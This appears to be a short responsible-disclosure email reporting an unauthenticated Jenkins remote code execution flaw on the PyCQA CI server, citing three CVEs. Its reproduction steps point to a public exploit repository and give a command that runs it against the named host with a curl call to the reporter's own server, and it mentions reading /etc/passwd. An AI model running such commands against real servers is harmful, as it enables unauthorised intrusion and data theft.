[Security] Jenkins Unauthenticated RCE on https://ci.pycqa.org/

May 16, 2019
2:45 a.m.
Dear Sir/Madam,

While searching Jenkins dashboards, I discovered that this domain (https://ci.pycqa.org/) is vulnerable to these CVEs (CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029), which allow an attacker to execute arbitrary commands on the target operating system.

Steps To Reproduce:

Download the exploit (https://github.com/orangetw/awesome-jenkins-rce-2019) and issue the command below:

python2.7 exp.py https://ci.pycqa.org/ "curl myserver.ip/oob/"

Then I checked my server to verify that the command executed (see attached images for a PoC showing the content of the /etc/passwd file).

Best regards,
-j3ssie-
Participants (1): Ái. Hồ Quốc